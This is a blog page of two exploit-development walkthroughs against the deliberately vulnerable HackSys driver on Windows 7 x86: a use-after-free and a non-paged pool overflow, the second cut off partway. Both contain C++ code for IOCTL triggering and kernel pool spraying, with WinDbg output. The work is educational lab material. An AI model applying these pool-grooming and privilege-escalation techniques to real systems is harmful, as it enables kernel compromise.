Normal view

There are new articles available, click to refresh the page.
Before yesterdayWindows Exploitation

HEVD Exploits – Windows 7 x86 Use-After-Free

By: h0mbre
23 April 2020 at 04:00

Introduction

Continuing on with my goal to develop exploits for the Hacksys Extreme Vulnerable Driver. I will be using HEVD 2.0. There are a ton of good blog posts out there walking through various HEVD exploits. I recommend you read them all! I referenced them heavily as I tried to complete these exploits. Almost nothing I do or say in this blog will be new or my own thoughts/ideas/techniques. There were instances where I diverged from any strategies I saw employed in the blogposts out of necessity or me trying to do my own thing to learn more.

This series will be light on tangential information such as:

  • how drivers work, the different types, communication between userland, the kernel, and drivers, etc
  • how to install HEVD,
  • how to set up a lab environment
  • shellcode analysis

The reason for this is simple, the other blog posts do a much better job detailing this information than I could ever hope to. It feels silly writing this blog series in the first place knowing that there are far superior posts out there; I will not make it even more silly by shoddily explaining these things at a high-level in poorer fashion than those aforementioned posts. Those authors have way more experience than I do and far superior knowledge, I will let them do the explaining. :)

This post/series will instead focus on my experience trying to craft the actual exploits.

Thanks

UAF Setup

I’ve never exploited a use-after-free bug on any system before. I vaguely understood the concept before starting this excercise. We need what, in my noob opinion, seems like quite a lot of primitives in order to make this work. Obviously HEVD goes out of its way to be vulnerable in precisely the correct way for us to get an exploit working which is perfect for me since I have no experience with this bug class and we’re just here to learn. I feel like although we have to utilize multiple functions via IOCTL, this is actually a more simple exploit to pull off than the pool overflow that we just did.

Also, I wanted to do this on 64 bit; however, most of the strategies I saw outlined required that we use NtQuerySystemInformation, which as far as I know requires your process to be elevated to an extent so I wanted to avoid that. On 64 bit, the pool header structure size changes from 0x8 bytes to 0x10 bytes which makes exploitation more cumbersome; however, there are some good walkthroughs out there about how to accomplish this. For now, let’s stick to x86.

What do we need in order to exploit a use-after-free bug? Well, it seems like after doing this excercise we need to be able to do the following:

  • allocate an object in the non-paged pool,
  • a mechansim that creates a reference to the object as a global variable, ie if our object is allocated at 0xFFFFFFFF, there is some variable out there in the program that is storing that address for later use,
  • the ability to free the memory and not have the previously established reference NULLed out, ie when the chunk is freed the program author doesn’t specify that the reference=NULL,
  • the ability to create “fake” objects that have the same size and controllable contents in the non-paged pool,
  • the ability to spray the non-paged pool and create perfectly sized holes so that our UAF and fake objects can be fitted in our created holes,
  • finally, the ability to use the no-longer valid reference to our freed chunk.

Allocating the UAF Object in the Pool

Let’s take a look at the UAF object allocation routine in the driver in IDA.

It may not be immediately clear what’s going on without stepping through the routine in the debugger but we actually have very little control over what is taking place here. I’ve created a small skeleton exploit code and set a breakpoint towards the start of the routine. Here is our code at the moment:

#include <iostream>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define ALLOCATE_UAF_IOCTL      0x222013
#define FREE_UAF_IOCTL          0x22201B
#define FAKE_OBJECT_IOCTL       0x22201F
#define USE_UAF_IOCTL           0x222017

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void create_UAF_object(HANDLE hFile) {

    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        ALLOCATE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);
}


int main() {

    HANDLE hFile = grab_handle();

    create_UAF_object(hFile);

    return 0;
}

You can see from the IDA screenshot that after the call to ExAllocatePoolWithTag, eax is placed in esi, this is about where I’ve placed the breakpoint, we can then take the value in esi which should be a pointer to our allocation, and go see what the allocation will look like after the subsequent memset operation completes. We can see some static values as well, such as waht appears to be the size of the allocation (0x58), which we know from our last post is actually undersold by 0x8 since we have to account also for the pool header, so our real allocation size in the pool is 0x60 bytes.

So we hit our breakpoint after ExAllocatePoolWithTag and then I just stepped through until the memset completed.

Right after the memset completed, we look up our object in the pool and see that it’s mostly been filled with A characters except for the first DWORD value has been left NULL. After stepping through the next two instructions:

We can see that the DWORD value has been filled and also that a null terminator has been added to the last byte of our allocation. This DWORD is the UaFObjectCallback which is a function pointer for a callback which gets used during a separate routine.

And lastly in the screenshot we can see that move esi, which is the location of our allocation, into the global variable g_UseAfterFreeObject. This is important because this is what makes this code vulnerable as this same variable will not be nulled out when the object is freed.

Freeing the UAF Object

Now, lets try interacting with the driver routine which allows us to free our object.

Not a whole lot here, we can see though that there is no effort made to NULL the global variable g_UserAfterFreeObject. You can see that even after we run the routine, the vairable still holds the value of our freed allocation address:

Allocating a Fake Object

Now let’s see how much freedom we have to allocate arbitrary objects in the non-paged pool. Looking at the function, it uses the same APIs we’re familiar with, does a probe for read to make sure the buffer is in user land (I think?), and then builds our chunk to our specifications.

I just sent a buffer of size 0x58 with all A characters for testing. It even appends a null-terminator to the end like the real UAF object allocator, but we control the contents of this one. This is good since we’ll have full control over the pointer value at prepended to the chunk that serves as the call back function pointer.

Executing UAF Object Callback

This is where the “use” portion of “Use-After-Free” comes in. There is a driver routine that allows us to take the address which holds the callback function pointer of the UAF object and then call the function there. We can see this in IDA.

We can see that as long as the value at [eax], which holds the address of our UAF object (or what used to be our UAF object before we freed it) is not NULL, we’ll go ahead and call the function pointer stored at that location (the callback function). Right now, if we called this, what would happen? Let’s see!

Looking up the memory address of what was our freed chunk we see that it is NOT NULL. We would actually call something, but the address that would be called is 0x852c22f0. Looking at that address, we see that there is just arbitrary code there.

This is not what we want. We want this to be predictable just like our last exploit. We want the freed address of our UAF object to be filled with our fake object, so when the function pointer at that address is called, it will be a pointer we control, our shellcode. To do this, our plan of attack is very similar to our last post. Please go through that exploit first!

Spraying the Non-Paged Pool

First thing is first, we need an object that fits our needs. Last post we used Event Objects, but this time around, since we need 0x60 sized chunks, we’ll be using IoCompletionReserve objects which we can allocate with NtAllocateReserveObject (thanks blogpost authors).

We’ll do the same thing we did last time but spray some more. In my testing I found that I had to spray more to get the chunks sequential like we want:

  • defragment the pool with 10,000 objects
  • aim for some sequential/contiguous blocks of objects with another spray of 30,000 objects.

Next, we’ll want to poke holes in the contiguous block portion, remember? We’ll be collecting handles to these objects in vectors so that we can later free the ones we need to create the holes. The holes are already the perfect size, so we’ll just free every other contiguous block handle so that way, every hole that is created in our contiguous block will be surrounded on both sides by our objects. Let’s update our exploit code and test out the spray. Huge thanks to @tekwizz123 once again for showing in his exploit how to get NtAllocateReserveObject into the program, would’ve taken me a long time to trouble shoot those compilation errors without his help. Our spray test code:

#include <iostream>
#include <vector>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define ALLOCATE_UAF_IOCTL      0x222013
#define FREE_UAF_IOCTL          0x22201B
#define FAKE_OBJECT_IOCTL       0x22201F
#define USE_UAF_IOCTL           0x222017

vector<HANDLE> defrag_handles;
vector<HANDLE> sequential_handles;

typedef struct _LSA_UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    UNICODE_STRING* ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES;

#define POBJECT_ATTRIBUTES OBJECT_ATTRIBUTES*

typedef NTSTATUS(WINAPI* _NtAllocateReserveObject)(
    OUT PHANDLE hObject,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN DWORD ObjectType);

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void create_UAF_object(HANDLE hFile) {

    cout << "[>] Creating UAF object...\n";
    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        ALLOCATE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not create UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] UAF object allocated.\n";
}

void free_UAF_object(HANDLE hFile) {

    cout << "[>] Freeing UAF object...\n";
    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        FREE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not free UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] UAF object freed.\n";
}

void allocate_fake_object(HANDLE hFile) {

    cout << "[>] Creating fake UAF object...\n";
    BYTE input_buffer[0x58] = { 0 };

    memset((void*)input_buffer, '\x41', 0x58);

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        FAKE_OBJECT_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not create fake UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] Fake UAF object created.\n";
}

void spray() {

    // thanks Tekwizz as usual
    _NtAllocateReserveObject NtAllocateReserveObject = 
        (_NtAllocateReserveObject)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtAllocateReserveObject");

    if (!NtAllocateReserveObject) {

        cout << "[!] Failed to get the address of NtAllocateReserve.\n";
        cout << "[!] Last error " << GetLastError() << "\n";
        exit(1);
    }

    cout << "[>] Spraying pool to defragment...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE hObject = 0x0;

        PHANDLE result = (PHANDLE)NtAllocateReserveObject((PHANDLE)&hObject,
            NULL,
            1); // specifies the correct object

        if (result != 0) {
            cout << "[!] Error allocating IoCo Object during defragmentation\n";
            exit(1);
        }
        defrag_handles.push_back(hObject);
    }
    cout << "[>] Defragmentation spray complete.\n";
    cout << "[>] Spraying sequential allocations...\n";
    for (int i = 0; i < 30000; i++) {

        HANDLE hObject = 0x0;

        PHANDLE result = (PHANDLE)NtAllocateReserveObject((PHANDLE)&hObject,
            NULL,
            1); // specifies the correct object

        if (result != 0) {
            cout << "[!] Error allocating IoCo Object during defragmentation\n";
            exit(1);
        }
        sequential_handles.push_back(hObject);
    }

    cout << "[>] Sequential spray complete.\n";

    cout << "[>] Poking 0x60 byte-sized holes in our sequential allocation...\n";
    for (int i = 0; i < sequential_handles.size(); i++) {
        if (i % 2 == 0) {
            BOOL freed = CloseHandle(sequential_handles[i]);
        }
    }
    cout << "[>] Holes poked lol.\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29997] << "\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29998] << "\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29999] << "\n";

    Sleep(1000);
    DebugBreak();
}

int main() {

    HANDLE hFile = grab_handle();

    //create_UAF_object(hFile);

    //free_UAF_object(hFile);

    //allocate_fake_object(hFile);

    spray();

    return 0;
}

We can see after running this and looking at one of the handles we dumped to the terminal (thanks FuzzySec!), we were able to get our pool looking the way we want. 0x60 byte chunks free surrounded by our IoCo objects.

kd> !handle 0x2724c

PROCESS 86974250  SessionId: 1  Cid: 1238    Peb: 7ffdf000  ParentCid: 1554
    DirBase: bf5d4fc0  ObjectTable: abb08b80  HandleCount: 25007.
    Image: HEVDUAF.exe

Handle table at 89f1f000 with 25007 entries in use

2724c: Object: 8543b6d0  GrantedAccess: 000f0003 Entry: 88415498
Object: 8543b6d0  Type: (84ff1a88) IoCompletionReserve
    ObjectHeader: 8543b6b8 (new version)
        HandleCount: 1  PointerCount: 1


kd> !pool 8543b6d0 
Pool page 8543b6d0 region is Nonpaged pool
 8543b000 size:   60 previous size:    0  (Allocated)  IoCo (Protected)
 8543b060 size:   38 previous size:   60  (Free)       `.C.
 8543b098 size:   20 previous size:   38  (Allocated)  ReTa
 8543b0b8 size:   28 previous size:   20  (Allocated)  FSro
 8543b0e0 size:  500 previous size:   28  (Free)       Io  
 8543b5e0 size:   60 previous size:  500  (Allocated)  IoCo (Protected)
 8543b640 size:   60 previous size:   60  (Free)       IoCo
*8543b6a0 size:   60 previous size:   60  (Allocated) *IoCo (Protected)
		Owning component : Unknown (update pooltag.txt)
 8543b700 size:   60 previous size:   60  (Free)       IoCo
 8543b760 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b7c0 size:   60 previous size:   60  (Free)       IoCo
 8543b820 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b880 size:   60 previous size:   60  (Free)       IoCo
 8543b8e0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b940 size:   60 previous size:   60  (Free)       IoCo
 8543b9a0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543ba00 size:   60 previous size:   60  (Free)       IoCo
 8543ba60 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bac0 size:   60 previous size:   60  (Free)       IoCo
 8543bb20 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bb80 size:   60 previous size:   60  (Free)       IoCo
 8543bbe0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bc40 size:   60 previous size:   60  (Free)       IoCo
 8543bca0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bd00 size:   60 previous size:   60  (Free)       IoCo
 8543bd60 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bdc0 size:   60 previous size:   60  (Free)       IoCo
 8543be20 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543be80 size:   60 previous size:   60  (Free)       IoCo
 8543bee0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bf40 size:   60 previous size:   60  (Free)       IoCo
 8543bfa0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)

Executing Plan

Now that we’ve confirmed our heap spray works, the next step is to implement our game-plan. We want to:

  • spray the heap to get it like so ^^,
  • allocate our UAF object,
  • free our UAF object,
  • create our fake objects with malicious callback function pointers,
  • activate the callback function.

All we really need to do now is allocate the shellcode, get a pointer to it, and place that pointer into our input buffer when we create our fake objects and spray those into the holes we poked so around 15,000 of them.

When we run our final code, we get our system shell!

Complete exploit code.

Conclusion

That was a pretty exaggerated exploit scenario I would guess, but it was perfect for me since I had never done a UAF exploit before. Next we’ll be doing the stack overflow again but this time on Windows 10 where we’ll have to bypass SMEP. Until next time.

Once again, big thanks to all the content producers out there for getting me through these exploits.

HEVD Exploits – Windows 7 x86 Non-Paged Pool Overflow

By: h0mbre
22 April 2020 at 04:00

Introduction

Continuing on with my goal to develop exploits for the Hacksys Extreme Vulnerable Driver. I will be using HEVD 2.0. There are a ton of good blog posts out there walking through various HEVD exploits. I recommend you read them all! I referenced them heavily as I tried to complete these exploits. Almost nothing I do or say in this blog will be new or my own thoughts/ideas/techniques. There were instances where I diverged from any strategies I saw employed in the blogposts out of necessity or me trying to do my own thing to learn more.

This series will be light on tangential information such as:

  • how drivers work, the different types, communication between userland, the kernel, and drivers, etc
  • how to install HEVD,
  • how to set up a lab environment
  • shellcode analysis

The reason for this is simple, the other blog posts do a much better job detailing this information than I could ever hope to. It feels silly writing this blog series in the first place knowing that there are far superior posts out there; I will not make it even more silly by shoddily explaining these things at a high-level in poorer fashion than those aforementioned posts. Those authors have way more experience than I do and far superior knowledge, I will let them do the explaining. :)

This post/series will instead focus on my experience trying to craft the actual exploits.

Thanks

This exploit required a lot of insight into the non-paged pool internals of Windows 7. These walkthroughs/blogs were extremely well written and made everything very logical and clear. I really appreciate the authors’ help! Again, I’m just recreating other people’s exploits in this series trying to learn, not inventing new ways to exploit pool overflows for 32 bit Windows 7. The exploit also required allocating the NULL page, which isn’t possible on x64 so this will be a 32 bit exploit only.

Reversing Relevant Function

The bug for this driver routine is really similar to some of the stack based buffer overflow vulnerabilities we’ve already done like the stack overflow and the integer overflow. We get a user buffer and send it to the routine which will allocate a kernel buffer and copy our user buffer into the kernel buffer. The only difference here is the type of memory used. Instead of the stack, this memory is allocated in the non-paged pool which are pool chunks that are guaranteed to be in physical memory (RAM) at all times and cannot be paged out. This stands in contrast to paged pool which is allowed to be “paged out” when there is no more RAM capacity to a secondary storage medium.

The APIs that are relevant here in this routine are ExAllocatePoolWithTag and ExFreePoolWithTag. This API prototype looks like this:

PVOID ExAllocatePoolWithTag(
  __drv_strictTypeMatch(__drv_typeExpr)POOL_TYPE PoolType,
  SIZE_T                                         NumberOfBytes,
  ULONG                                          Tag
);

In our routine all of these parameters are hardcoded for us. PoolType is set to NonPagedPool, NumberOfBytes is set to 0x1F8, and Tag is set to 0x6B636148 (‘Hack’). This by itself is fine and there is no vulnerability obviously; however, the driver routine uses memcpy to transfer data from the user buffer to this newly allocated non-paged pool kernel buffer and uses the size of the user buffer as the size argument. (This precisely the bug in the Jungo driver that @steventseeley discovered via fuzzing.) If the size of our user buffer is larger than the kernel buffer, we will overwrite some data in the adjacent non-paged pool. Here is a screenshot of the function in IDA Free 7.0.

Nothing too complicated reversing wise, we can even see that right after our pool buffer is allocated, it is de-allocated with ExFreePoolWithTag.

If we call the function with the following skeleton code, we will see in WinDBG that everything works as normal and we can start trying to understand how the pool chunks are structured.

#include <iostream>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x22200F


HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void send_payload(HANDLE hFile) {

    ULONG payload_len = 0x1F8;

    LPVOID input_buff = VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memset(input_buff, '\x42', payload_len);

    cout << "[>] Sending buffer size of: " << dec << payload_len << "\n";

    DWORD bytes_ret = 0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        payload_len,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] DeviceIoControl failed!\n";

    }
}

int main() {

    HANDLE hFile = grab_handle();

    send_payload(hFile);

    return 0;
}

I set a breakpoint at offset 0x4D64 with this command in WinDBG: bp !HEVD+4D64 which is right after the memcpy operation and we see that our pool buffer has been filled with our \x42 characters. At this point a pointer to the allocated kernel buffer is still in eax so we can go to that location with the !pool command which will start at the beginning of that page of memory and display certain aspects of the memory allocated there.

kd> !pool 85246430
Pool page 85246430 region is Nonpaged pool
 85246000 size:   c8 previous size:    0  (Allocated)  Ntfx
 852460c8 size:   10 previous size:   c8  (Free)       .PZH
 852460d8 size:   20 previous size:   10  (Allocated)  ReTa
 852460f8 size:   20 previous size:   20  (Allocated)  ReTa
 85246118 size:   48 previous size:   20  (Allocated)  Vad 
 85246160 size:   68 previous size:   48  (Allocated)  NpFn Process: 8507a030
 852461c8 size:   20 previous size:   68  (Allocated)  ReTa
 852461e8 size:   20 previous size:   20  (Allocated)  ReTa
 85246208 size:  168 previous size:   20  (Free)       CcSc
 85246370 size:   b8 previous size:  168  (Allocated)  NbtD
*85246428 size:  200 previous size:   b8  (Allocated) *Hack
		Owning component : Unknown (update pooltag.txt)
 85246628 size:   20 previous size:  200  (Allocated)  ReTa
 85246648 size:   68 previous size:   20  (Allocated)  FMsl
 852466b0 size:   c8 previous size:   68  (Allocated)  Ntfx
 85246778 size:  180 previous size:   c8  (Free)       EtwG
 852468f8 size:   98 previous size:  180  (Allocated)  MmCa
 85246990 size:    8 previous size:   98  (Free)       Nb29
 85246998 size:   48 previous size:    8  (Allocated)  Vad 
 852469e0 size:  1b8 previous size:   48  (Allocated)  LSbf
 85246b98 size:   b8 previous size:  1b8  (Allocated)  File (Protected)
 85246c50 size:   60 previous size:   b8  (Free)       Clfs
 85246cb0 size:  1b0 previous size:   60  (Allocated)  NSIk
 85246e60 size:   20 previous size:  1b0  (Allocated)  ReTa
 85246e80 size:   b8 previous size:   20  (Allocated)  File (Protected)
 85246f38 size:   c8 previous size:   b8  (Allocated)  Ntfx

We that even though our pointer in eax to our kernel buffer was 0x85246430, the allocation actually begins at 0x85246428 which is 0x8 before. This is because there is a 4 byte ULONG value and our pool tag placed before our actually buffer begins. Using some of the commands from the aforementioned blogposts goes a long way in WinDBG to being able to clearly think about these data structures.

kd> dt nt!_POOL_HEADER 85246428
   +0x000 PreviousSize     : 0y000010111 (0x17)
   +0x000 PoolIndex        : 0y0000000 (0)
   +0x002 BlockSize        : 0y001000000 (0x40)
   +0x002 PoolType         : 0y0000010 (0x2)
   +0x000 Ulong1           : 0x4400017
   +0x004 PoolTag          : 0x6b636148
   +0x004 AllocatorBackTraceIndex : 0x6148
   +0x006 PoolTagHash      : 0x6b63

This shows us the makeup of the pool header. We can see it spans 8 total bytes which we knew. The numbers that begin 0y are binary. But, you can see that PreviousSize, PoolIndex, BlockSize, and PoolType all get their values smushed together and form this Ulong1 member which begins at offset 0x000. Then, from that offset, we get our pool tag. So that’s all 8 bytes accounted for. We can use the memory pane to scroll to the bottom of our buffer and spy on the next memory chunk’s header as well.

We can see that the header values for the next chunk are: 40 00 04 04 52 65 54 61.

The only other thing to pay attention to, was that the !pool command told us our chunk was 0x200 bytes long which makes sense when you add the size of the header 0x8 to our allocated buffer size of 0x1F8.

Generic Attack Strategy

Before we proceed, we have to understand how we’re going to utilize this ability, via our oversized user buffer, to arbitrarily overwrite data in the adjacent pool allocation as an attack vector. What we have right now is the ability to overwrite pool memory. In order for this to be worth while for us, we have to find a way to get the pool into a state where what we’re overwriting is predictable. If what we’re overwriting is unpredictable, we can never form a reliable exploit. If we damage some of the fields here and aren’t surgical in our overwrites, we’ll easily get a BSOD.

Generically, in its organic state, the non-paged pool is fragmented, meaning there are holes in it from chunks being freed arbitrarily by other processes on the system. What we want to do is cover these holes by spraying a ton of objects into the non-paged pool so that the pool allocation mechanism places our chunks into those available slots. Once this is complete, we’ll want to spray even more objects so that by far, the most common objects in the pool are the ones we have just sprayed.

By way of analogy, if you had a bag of a chess set’s pieces, you would have low odds of pulling a King from the bag; however, if you then added 15,000 Kings to the bag, your chances are much better!

So we have two goals outlined so far:

  • spray the pool with objects until its organically existing holes are patched with our objects,
  • spray the pool again to increase the sheer number of objects we’ve allocated so that they’ll be sequential in non-paged pool memory.

What we’ll do next, is take our pretty pool allocations that form a large solid block, and poke holes in it the size of our kernel buffer we can allocate with the driver routine. Our kernel buffer is 0x200 bytes remember. This way, when our kernel buffer is allocated in the pool, the allocator will place it in the newly freed 0x200 byte hole we have just created. Now what we have, is our alloaction completely surrounded by the objects we had sprayed. This is perfect because now when our buffer overwrites data in the adjacent pool allocation, we’ll know exactly what we’re overwriting because it will be a chunk that we allocated ourselves, not an arbitrary system process.

We will use this ability to overwrite data to predictably overwrite a piece of data in one of our allocated objects that will, once the allocation is freed, end up to the kernel executing a function pointer which we will have filled with shellcode. So now our generic gameplan is:

  • spray the pool with objects until its organically existing holes are patched with our objects,
  • spray the pool again to increase the sheer number of objects we’ve allocated so that they’ll be sequential in non-paged pool memory,
  • poke some nice 0x200 byte-sized holes in the allocations,
  • use our driver routine to fit our kernel buffer in one of these new holes,
  • have that allocation predictably overwrite information in the adjacent allocation that leads to kernel execution of our shellcode when the corrupted allocation is freed.

Next, we’ll get to know the object we’ll be using to spray the pool.

Event Objects

The blogpost authors inform us that Event Objects are perfect for this job for a few reasons, but one of the main reasons is that it is 0x40 bytes in size. A quick Python interpreter check shows us that we can neatly free 8 Event Objects and have our 0x200 byte sized holes we wanted.

>>> 0x200 % 0x40
0
>>> 0x200 / 0x40
8.0

We don’t care much about the content of these events, so every parameter will be basically NULL when we use the CreateEvent API:

HANDLE CreateEventA(
  LPSECURITY_ATTRIBUTES lpEventAttributes,
  BOOL                  bManualReset,
  BOOL                  bInitialState,
  LPCSTR                lpName
);

What’s most important for us now, is finding out what we need to overwrite in this object to get code execution when the corrupted Event Object is freed. We’ll go ahead and spray a similar amount of objects that FuzzySec and r0otki7 did,

  • 10,000 to fill the holes in the fragmented pool
  • 5,000 to create a nice long contiguous block of Event Objects

Our code now looks like this:

#include <iostream>
#include <vector>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x22200F

vector<HANDLE> defragment_handles;
vector<HANDLE> sequential_handles;

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void spray_pool() {

    cout << "[>] Spraying pool to defragment...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during defragmentation\n";
            exit(1);
        }

        defragment_handles.push_back(result);
    }
    cout << "[>] Defragmentation spray complete.\n";
    cout << "[>] Spraying sequential allocations...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during sequential.\n";
            exit(1);
        }

        sequential_handles.push_back(result);
    }
    
    cout << "[>] Sequential spray complete.\n";
}

void send_payload(HANDLE hFile) {
    
    ULONG payload_len = 0x1F8;

    LPVOID input_buff = VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memset(input_buff, '\x42', payload_len);

    cout << "[>] Sending buffer size of: " << dec << payload_len << "\n";

    DWORD bytes_ret = 0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        payload_len,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] DeviceIoControl failed!\n";

    }
}

int main() {

    HANDLE hFile = grab_handle();

    spray_pool();

    send_payload(hFile);

    return 0;
}

Take note that we’re storing the handles to each Event Object in a vector so that we can access those later.

Let’s spray our objects and then allocate our kernel buffer and see what the page looks like that our kernel buffer ends up being allocated on. We still have the same breakpoint from before, right after the memcpy operation. At this point the kernel buffer pointer is still in eax don’t forget, so I just want to subtract 0x1000 from it because thats a small page size and then advance by just plugging that right in to the !pool command we get the whole page’s allocation information:

kd> !pool 8628b008-0x1000
Pool page 8628a008 region is Nonpaged pool
*8628a000 size:   40 previous size:    0  (Allocated) *Even (Protected)
		Pooltag Even : Event objects
 8628a040 size:   80 previous size:   40  (Free)       b.2.
 8628a0c0 size:   40 previous size:   80  (Allocated)  Even (Protected)
 8628a100 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a140 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a180 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a1c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a200 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a240 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a280 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a2c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a300 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a340 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a380 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a3c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a400 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a440 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a480 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a4c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a500 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a540 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a580 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a5c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a600 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a640 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a680 size:   40 previous size:   40  (Allocated)  Even (Protected)
